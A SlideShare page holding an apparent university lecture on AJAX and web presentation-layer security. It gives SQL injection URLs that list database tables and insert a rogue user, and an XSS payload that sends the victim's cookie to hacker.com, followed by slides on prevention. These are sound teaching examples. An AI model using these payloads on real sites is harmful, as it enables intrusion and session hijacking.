SlideShare a Scribd company logo

Day8

Download as PPTX, PDF
M
madamewoolf
EducationTechnology
1 of 18
CSE 136 - Lecture 8  AJAX  Presentation Layer Security  Lab
AJAX - what & why?  Asynchronous Javascript and XML  Why? Improve performance  To avoid postback - saves page re-loading time  Transfer smaller amount of data across network  Example: select year, make, model
AJAX - flow
Ajax - postback vs callback
Ajax - ASP.NET Ajax Architecture
Web Attack - Resource Enumeration  Common Files  test.txt  back.zip  upload.zip  passwords.txt  users.txt  checkout.aspx.bak  checkout.asp.old  Common Directories  /admin  /reports  /test  /upload  /temp  /include  /logs
Web Attack - Parameter manipulation  /student/details/1000  change to 1001?  SQL Injection  query = "select product_name from product where product_id=" + PID  PID comes from web parameter:  http://myweb.com/product.aspx?PID=1  http://myweb.com/product.aspx?PID=1;union select name from sysobjects where xtype='U'  Hackers add himself to the Users table  http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
Web Attack – cross site scripting (XSS)  Once you comprise the database, insert javascript into the tables  product.description = ,'<script>document.location='http://hacker.com/collect or.html? cookie='+document.cookie</script>  Hacker now knows your cookie when the content is rendered.  Danger of cross site scripting  Contents of the current document cookie is sent off to hacker.com  Session IDs and authentication tokens are commonly stored in cookies  Javascript can log key strokes
Web Attack - Prevention  Remove all SQL Injection code  HTML-Encode all data displayed to prevent XSS  Treat any input as potential threat  user can enter javascript in textbox and textarea  Use validation on the server (user could disable javascript error checking on browser)  Encrypt cookies  user_id="100" // No  user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS- JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD"  Upload Files:  Email attachment  Business documents  Servers should run Virus checker on all uploaded files
Web Attack and AJAX  The methods of a Web service are analogous to the form inputs of a Web application.  They are easy to find, easy to attack  WSDL is now open to public (example data often provided)
Web Attack - Traditional vs AJAX
Web Attack - white vs. black Exposed BL domain model
Web Attack - Ajax security mistakes Solution: Use cookie at the WEB web-service
Web Attack - Securing Ajax server  Install validation filter  Use Regular Expression to validate input strings  Use Regular Expression to remove "attack" characters: < & />, etc  Validate user thru cookies/sessions (WEB web-services)
Review question  Is ajax synchronous or asynchronous?  Why used ajax?  Is ajax architecture more secured or less?  What is XSS?  Difference between white box and black box?
Your assignment  Complete your MVC project with test cases  Project due next Thursday
Lab  Due: Grade your middle tier and test cases
References  .NET : Architecting Applications for the Enterprise  Ajax Security

Recommended

Day6
Day6Day6
Day6madamewoolf
 
Day2
Day2Day2
Day2madamewoolf
 
Day7
Day7Day7
Day7madamewoolf
 
Day1
Day1Day1
Day1madamewoolf
 
Day4
Day4Day4
Day4madamewoolf
 
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows AzureCloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows AzureDavid Chou
 
Microsoft Data Access Technologies
Microsoft Data Access TechnologiesMicrosoft Data Access Technologies
Microsoft Data Access TechnologiesDavid Chou
 
Java on Windows Azure
Java on Windows AzureJava on Windows Azure
Java on Windows AzureDavid Chou
 

Recommended

Day6
Day6Day6
Day6madamewoolf
 
Day2
Day2Day2
Day2madamewoolf
 
Day7
Day7Day7
Day7madamewoolf
 
Day1
Day1Day1
Day1madamewoolf
 
Day4
Day4Day4
Day4madamewoolf
 
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows AzureCloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows AzureDavid Chou
 
Microsoft Data Access Technologies
Microsoft Data Access TechnologiesMicrosoft Data Access Technologies
Microsoft Data Access TechnologiesDavid Chou
 
Java on Windows Azure
Java on Windows AzureJava on Windows Azure
Java on Windows AzureDavid Chou
 
Microsoft SQL Server 2008
Microsoft SQL Server 2008Microsoft SQL Server 2008
Microsoft SQL Server 2008Hossein Zahed
 
Entity Framework Overview
Entity Framework OverviewEntity Framework Overview
Entity Framework Overviewukdpe
 
Web apps architecture
Web apps architectureWeb apps architecture
Web apps architectureTanmoy Barman
 
Windows Azure AppFabric
Windows Azure AppFabricWindows Azure AppFabric
Windows Azure AppFabricDavid Chou
 
MVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCMVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCAnton Krasnoshchok
 
Microsoft Database Options
Microsoft Database OptionsMicrosoft Database Options
Microsoft Database OptionsDavid Chou
 
Enterprise Software Architecture
Enterprise Software ArchitectureEnterprise Software Architecture
Enterprise Software Architecturerahmed_sct
 
NServicebus WCF Integration 101
NServicebus WCF Integration 101NServicebus WCF Integration 101
NServicebus WCF Integration 101Rich Helton
 
Overview Of Xaware
Overview Of XawareOverview Of Xaware
Overview Of Xawareghessler
 
DOSUG Tech Overview of XAware
DOSUG Tech Overview of XAwareDOSUG Tech Overview of XAware
DOSUG Tech Overview of XAwareMatthew McCullough
 
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingWeblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingEvanta Technologies
 
Java database connectivity
Java database connectivityJava database connectivity
Java database connectivityVaishali Modi
 
Multi-tenancy in Java
Multi-tenancy in JavaMulti-tenancy in Java
Multi-tenancy in Javaseges
 
Session And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaSession And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaJainamParikh3
 
Jdbc
JdbcJdbc
JdbcMumbai Academisc
 
Jdbc
JdbcJdbc
Jdbcleminhvuong
 
Oracle WorkManager
Oracle WorkManagerOracle WorkManager
Oracle WorkManagerGiampiero Cerroni
 
Jdbc in servlets
Jdbc in servletsJdbc in servlets
Jdbc in servletsNuha Noor
 
JDBC in Servlets
JDBC in ServletsJDBC in Servlets
JDBC in ServletsEleonora Ciceri
 
Database and Java Database Connectivity
Database and Java Database ConnectivityDatabase and Java Database Connectivity
Database and Java Database ConnectivityGary Yeh
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingDilan Warnakulasooriya
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & DefenseBlueinfy Solutions
 

More Related Content

What's hot

Microsoft SQL Server 2008
Microsoft SQL Server 2008Microsoft SQL Server 2008
Microsoft SQL Server 2008Hossein Zahed
 
Entity Framework Overview
Entity Framework OverviewEntity Framework Overview
Entity Framework Overviewukdpe
 
Web apps architecture
Web apps architectureWeb apps architecture
Web apps architectureTanmoy Barman
 
Windows Azure AppFabric
Windows Azure AppFabricWindows Azure AppFabric
Windows Azure AppFabricDavid Chou
 
MVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCMVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCAnton Krasnoshchok
 
Microsoft Database Options
Microsoft Database OptionsMicrosoft Database Options
Microsoft Database OptionsDavid Chou
 
Enterprise Software Architecture
Enterprise Software ArchitectureEnterprise Software Architecture
Enterprise Software Architecturerahmed_sct
 
NServicebus WCF Integration 101
NServicebus WCF Integration 101NServicebus WCF Integration 101
NServicebus WCF Integration 101Rich Helton
 
Overview Of Xaware
Overview Of XawareOverview Of Xaware
Overview Of Xawareghessler
 
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingWeblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingEvanta Technologies
 
Java database connectivity
Java database connectivityJava database connectivity
Java database connectivityVaishali Modi
 
Multi-tenancy in Java
Multi-tenancy in JavaMulti-tenancy in Java
Multi-tenancy in Javaseges
 
Session And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaSession And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaJainamParikh3
 
Jdbc in servlets
Jdbc in servletsJdbc in servlets
Jdbc in servletsNuha Noor
 
Database and Java Database Connectivity
Database and Java Database ConnectivityDatabase and Java Database Connectivity
Database and Java Database ConnectivityGary Yeh
 

What's hot (20)

Microsoft SQL Server 2008
Microsoft SQL Server 2008Microsoft SQL Server 2008
Microsoft SQL Server 2008
 
Entity Framework Overview
Entity Framework OverviewEntity Framework Overview
Entity Framework Overview
 
Web apps architecture
Web apps architectureWeb apps architecture
Web apps architecture
 
Windows Azure AppFabric
Windows Azure AppFabricWindows Azure AppFabric
Windows Azure AppFabric
 
MVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCMVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVC
 
Microsoft Database Options
Microsoft Database OptionsMicrosoft Database Options
Microsoft Database Options
 
Enterprise Software Architecture
Enterprise Software ArchitectureEnterprise Software Architecture
Enterprise Software Architecture
 
NServicebus WCF Integration 101
NServicebus WCF Integration 101NServicebus WCF Integration 101
NServicebus WCF Integration 101
 
Overview Of Xaware
Overview Of XawareOverview Of Xaware
Overview Of Xaware
 
DOSUG Tech Overview of XAware
DOSUG Tech Overview of XAwareDOSUG Tech Overview of XAware
DOSUG Tech Overview of XAware
 
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingWeblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
 
Java database connectivity
Java database connectivityJava database connectivity
Java database connectivity
 
Multi-tenancy in Java
Multi-tenancy in JavaMulti-tenancy in Java
Multi-tenancy in Java
 
Session And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaSession And Cookies In Servlets - Java
Session And Cookies In Servlets - Java
 
Jdbc
JdbcJdbc
Jdbc
 
Jdbc
JdbcJdbc
Jdbc
 
Oracle WorkManager
Oracle WorkManagerOracle WorkManager
Oracle WorkManager
 
Jdbc in servlets
Jdbc in servletsJdbc in servlets
Jdbc in servlets
 
JDBC in Servlets
JDBC in ServletsJDBC in Servlets
JDBC in Servlets
 
Database and Java Database Connectivity
Database and Java Database ConnectivityDatabase and Java Database Connectivity
Database and Java Database Connectivity
 

Similar to Day8

OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site ScriptingOWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site ScriptingDenim Group
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
AJAX: How to Divert Threats
AJAX: How to Divert ThreatsAJAX: How to Divert Threats
AJAX: How to Divert ThreatsCenzic
 
How to build a Citrix infrastructure on AWS
How to build a Citrix infrastructure on AWSHow to build a Citrix infrastructure on AWS
How to build a Citrix infrastructure on AWSDenis Gundarev
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automationOWASP
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
The complete ASP.NET (IIS) Tutorial with code example in power point slide show
The complete ASP.NET (IIS) Tutorial with code example in power point slide showThe complete ASP.NET (IIS) Tutorial with code example in power point slide show
The complete ASP.NET (IIS) Tutorial with code example in power point slide showSubhas Malik
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersoazabir
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730chadtindel
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)Nitroxis Sprl
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxjohnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxazida3
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
Web Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok ChernWeb Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok ChernQuek Lilian
 

Similar to Day8 (20)

Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site ScriptingOWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
AJAX: How to Divert Threats
AJAX: How to Divert ThreatsAJAX: How to Divert Threats
AJAX: How to Divert Threats
 
How to build a Citrix infrastructure on AWS
How to build a Citrix infrastructure on AWSHow to build a Citrix infrastructure on AWS
How to build a Citrix infrastructure on AWS
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
The complete ASP.NET (IIS) Tutorial with code example in power point slide show
The complete ASP.NET (IIS) Tutorial with code example in power point slide showThe complete ASP.NET (IIS) Tutorial with code example in power point slide show
The complete ASP.NET (IIS) Tutorial with code example in power point slide show
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of users
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
Web Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok ChernWeb Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok Chern
 

Recently uploaded

ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...JhezDiaz1
 
How to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPHow to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPCeline George
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
Grade 9 Q4-MELC1-Active and Passive Voice.pptx
Grade 9 Q4-MELC1-Active and Passive Voice.pptxGrade 9 Q4-MELC1-Active and Passive Voice.pptx
Grade 9 Q4-MELC1-Active and Passive Voice.pptxChelloAnnAsuncion2
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...Nguyen Thanh Tu Collection
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxpboyjonauth
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxiammrhaywood
 
Planning a health career 4th Quarter.pptx
Planning a health career 4th Quarter.pptxPlanning a health career 4th Quarter.pptx
Planning a health career 4th Quarter.pptxLigayaBacuel1
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Jisc
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17Celine George
 
Atmosphere science 7 quarter 4 .........
Atmosphere science 7 quarter 4 .........Atmosphere science 7 quarter 4 .........
Atmosphere science 7 quarter 4 .........LeaCamillePacle
 
Solving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxSolving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxOH TEIK BIN
 
Hierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of managementHierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of managementmkooblal
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxAnupkumar Sharma
 
Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Mark Reed
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Celine George
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTiammrhaywood
 

Recently uploaded (20)

ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
 
How to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPHow to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERP
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 
Grade 9 Q4-MELC1-Active and Passive Voice.pptx
Grade 9 Q4-MELC1-Active and Passive Voice.pptxGrade 9 Q4-MELC1-Active and Passive Voice.pptx
Grade 9 Q4-MELC1-Active and Passive Voice.pptx
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
 
Raw materials used in Herbal Cosmetics.pptx
Raw materials used in Herbal Cosmetics.pptxRaw materials used in Herbal Cosmetics.pptx
Raw materials used in Herbal Cosmetics.pptx
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptx
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
 
Planning a health career 4th Quarter.pptx
Planning a health career 4th Quarter.pptxPlanning a health career 4th Quarter.pptx
Planning a health career 4th Quarter.pptx
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...
 
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17
 
Atmosphere science 7 quarter 4 .........
Atmosphere science 7 quarter 4 .........Atmosphere science 7 quarter 4 .........
Atmosphere science 7 quarter 4 .........
 
OS-operating systems- ch04 (Threads) ...
OS-operating systems- ch04 (Threads) ...OS-operating systems- ch04 (Threads) ...
OS-operating systems- ch04 (Threads) ...
 
Solving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxSolving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptx
 
Hierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of managementHierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of management
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
 

Day8

  • 1. CSE 136 - Lecture 8  AJAX  Presentation Layer Security  Lab
  • 2. AJAX - what & why?  Asynchronous Javascript and XML  Why? Improve performance  To avoid postback - saves page re-loading time  Transfer smaller amount of data across network  Example: select year, make, model
  • 4. Ajax - postback vs callback
  • 5. Ajax - ASP.NET Ajax Architecture
  • 6. Web Attack - Resource Enumeration  Common Files  test.txt  back.zip  upload.zip  passwords.txt  users.txt  checkout.aspx.bak  checkout.asp.old  Common Directories  /admin  /reports  /test  /upload  /temp  /include  /logs
  • 7. Web Attack - Parameter manipulation  /student/details/1000  change to 1001?  SQL Injection  query = "select product_name from product where product_id=" + PID  PID comes from web parameter:  http://myweb.com/product.aspx?PID=1  http://myweb.com/product.aspx?PID=1;union select name from sysobjects where xtype='U'  Hackers add himself to the Users table  http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
  • 8. Web Attack – cross site scripting (XSS)  Once you comprise the database, insert javascript into the tables  product.description = ,'<script>document.location='http://hacker.com/collect or.html? cookie='+document.cookie</script>  Hacker now knows your cookie when the content is rendered.  Danger of cross site scripting  Contents of the current document cookie is sent off to hacker.com  Session IDs and authentication tokens are commonly stored in cookies  Javascript can log key strokes
  • 9. Web Attack - Prevention  Remove all SQL Injection code  HTML-Encode all data displayed to prevent XSS  Treat any input as potential threat  user can enter javascript in textbox and textarea  Use validation on the server (user could disable javascript error checking on browser)  Encrypt cookies  user_id="100" // No  user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS- JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD"  Upload Files:  Email attachment  Business documents  Servers should run Virus checker on all uploaded files
  • 10. Web Attack and AJAX  The methods of a Web service are analogous to the form inputs of a Web application.  They are easy to find, easy to attack  WSDL is now open to public (example data often provided)
  • 11. Web Attack - Traditional vs AJAX
  • 12. Web Attack - white vs. black Exposed BL domain model
  • 13. Web Attack - Ajax security mistakes Solution: Use cookie at the WEB web-service
  • 14. Web Attack - Securing Ajax server  Install validation filter  Use Regular Expression to validate input strings  Use Regular Expression to remove "attack" characters: < & />, etc  Validate user thru cookies/sessions (WEB web-services)
  • 15. Review question  Is ajax synchronous or asynchronous?  Why used ajax?  Is ajax architecture more secured or less?  What is XSS?  Difference between white box and black box?
  • 16. Your assignment  Complete your MVC project with test cases  Project due next Thursday
  • 17. Lab  Due: Grade your middle tier and test cases
  • 18. References  .NET : Architecting Applications for the Enterprise  Ajax Security